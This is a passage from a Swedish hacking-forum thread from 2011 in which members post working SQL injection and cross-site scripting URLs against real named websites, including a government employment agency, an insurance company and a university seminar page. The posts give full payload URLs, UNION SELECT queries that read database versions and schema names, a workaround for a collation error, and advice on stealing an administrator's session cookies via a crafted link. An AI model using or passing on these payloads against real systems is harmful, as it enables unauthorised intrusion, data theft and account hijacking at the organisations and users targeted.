2011-06-17, 22:51
  #3001
Medlem
SQLi:
Kod:
http://www.livshandboken.se/index.taf?_page=cat&cat_auid=68
__________________
Senast redigerad av chippzy 2011-06-17 kl. 22:54.
Citera
2011-06-18, 03:36
  #3002
Medlem
Rynes avatar
Citat:
Ursprungligen postat av Pelle-pirat
XSS i http://www.arbetsformedlingen.se/

Snyggt fynd.
Kod:
http://www.arbetsformedlingen.se/4.5aafe79611f3cb4b46c800015306.html.portletaction?action=performSearch&sv.url=12.5aafe79611f3cb4b46c800015314&query=%22%3E%3Cscript%3Ealert(/Ryne/)%3C%2Fscript%3E
Citera
2011-06-18, 16:33
  #3003
Medlem
Citat:
Ursprungligen postat av Ryne
Snyggt fynd.
Kod:
http://www.arbetsformedlingen.se/4.5aafe79611f3cb4b46c800015306.html.portletaction?action=performSearch&sv.url=12.5aafe79611f3cb4b46c800015314&query=%22%3E%3Cscript%3Ealert(/Ryne/)%3C%2Fscript%3E

Felet åtgärdat
Citera
2011-06-18, 18:42
  #3004
Medlem
BrottareGustavs avatar
Går det göra något om man hittat en hemsida som har en XSS-Exploit förutom att köra på phishing och sån't? T.ex hämta information ur databaser som med SQL-Injektioner?

Hemsidan jag har hittat är en bibliotekshemsida som man kan söka efter böcker på.. Ingen inloggning eller så som man kan sno, tyvärr

Sammanfattning av mitt sluddriga inlägg: Går det göra något annat än att sno konton med XSS-Attacker?
Citera
2011-06-18, 19:07
  #3005
Medlem
ant's avatar
Citat:
Ursprungligen postat av BrottareGustav
Går det göra något om man hittat en hemsida som har en XSS-Exploit förutom att köra på phishing och sån't? T.ex hämta information ur databaser som med SQL-Injektioner?

Hemsidan jag har hittat är en bibliotekshemsida som man kan söka efter böcker på.. Ingen inloggning eller så som man kan sno, tyvärr

Sammanfattning av mitt sluddriga inlägg: Går det göra något annat än att sno konton med XSS-Attacker?
Beror ju på vad för slags XSS det är. Persistent/non-persistent?
Citera
2011-06-18, 19:15
  #3006
Medlem
BrottareGustavs avatar
Citat:
Ursprungligen postat av ant'
Beror ju på vad för slags XSS det är. Persistent/non-persistent?




Vad är skillnaden? Jag kan köra så jag ser mina kakor och en alert i sökrutan =)
Citera
2011-06-18, 19:34
  #3007
Medlem
ant's avatar
Citat:
Ursprungligen postat av BrottareGustav


Vad är skillnaden? Jag kan köra så jag ser mina kakor och en alert i sökrutan =)
http://en.wikipedia.org/wiki/Cross-S...Non-persistent

Om du skickar en länk med lite väl vald XSS i till en administratör så skulle du möjligtvis kunna sno dennes kakor men annars går det inte att göra så mycket mer med non-persistent XSS.
Citera
2011-06-18, 20:06
  #3008
Medlem
BrottareGustavs avatar
Citat:
Ursprungligen postat av ant'
http://en.wikipedia.org/wiki/Cross-S...Non-persistent

Om du skickar en länk med lite väl vald XSS i till en administratör så skulle du möjligtvis kunna sno dennes kakor men annars går det inte att göra så mycket mer med non-persistent XSS.


Jaha!! Tack som fan, blev lite rörigt i hjärnan.. Men nu fattar jag hur man snor kakorna =) Hehe, tog lite tid att fatta.. men som sagt.. De mesta kommer när man tänker på något helt annat. Tack så mycket
Citera
2011-06-18, 23:58
  #3009
Medlem
XSS i www.if.se


Kort om If

If är Nordens ledande skadeförsäkringsbolag med cirka 3,6 miljoner kunder. If har 6 900 anställda och ägs av finländska Sampokoncernen.


Kod:
http://www.if[punkt]se/web/se/Pages/Search.aspx?k="><script>alert(document.cookie)</script>

Håll till godo.
Citera
2011-06-19, 02:46
  #3010
Medlem
PostWhores avatar
Citat:
Ursprungligen postat av Pelle-pirat
XSS i www.if.se


Kort om If

If är Nordens ledande skadeförsäkringsbolag med cirka 3,6 miljoner kunder. If har 6 900 anställda och ägs av finländska Sampokoncernen.


Kod:
http://www.if[punkt]se/web/se/Pages/Search.aspx?k="><script>alert(document.cookie)</script>

Håll till godo.

Jag har seriöst aldrig sätt att du har postat skitsidor som alla andra här gör, keep it up!

Riktig kvalite!
Citera
2011-06-19, 12:29
  #3011
Medlem
tmxsevens avatar
SQLi
version: 5.0.77
current database: csml
Kod:
http://www[dot]csml[dot]ucl[dot]ac[dot]uk/seminars/index.php?do=show_combo&combo_key=-bb3e1dd54f55f96ba78825dfe889c21c'+UNION+SELECT+concat(version()),2,3--+
Kod:
http://www[dot]csml[dot]ucl[dot]ac[dot]uk/seminars/index.php?do=show_combo&combo_key=-bb3e1dd54f55f96ba78825dfe889c21c'+UNION+SELECT+concat(database()),2,3--+

När jag kör...
Kod:
http://www[dot]csml[dot]ucl[dot]ac[dot]uk/seminars/index.php?do=show_combo&combo_key=-bb3e1dd54f55f96ba78825dfe889c21c'+UNION+SELECT+group_concat(schema_name),2,3+from+informa  tion_schema.schemata--+
så får jag följande: Error 1271 : Illegal mix of collations for operation 'UNION'

Någon som vet?

EDIT: Löste problemet så här
Kod:
http://www[dot]csml[dot]ucl[dot]ac[dot]uk/seminars/index.php?do=show_combo&combo_key=-bb3e1dd54f55f96ba78825dfe889c21c'+UNION+SELECT+UNHEX(HEX(group_concat(schema_name))),2,3+  from+information_schema.schemata--+
__________________
Senast redigerad av tmxseven 2011-06-19 kl. 12:37.
Citera
2011-06-19, 23:57
  #3012
Medlem
BrottareGustavs avatar
XSS

Kod:
http://accounts.elvensoft.net/forgotpass.php
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in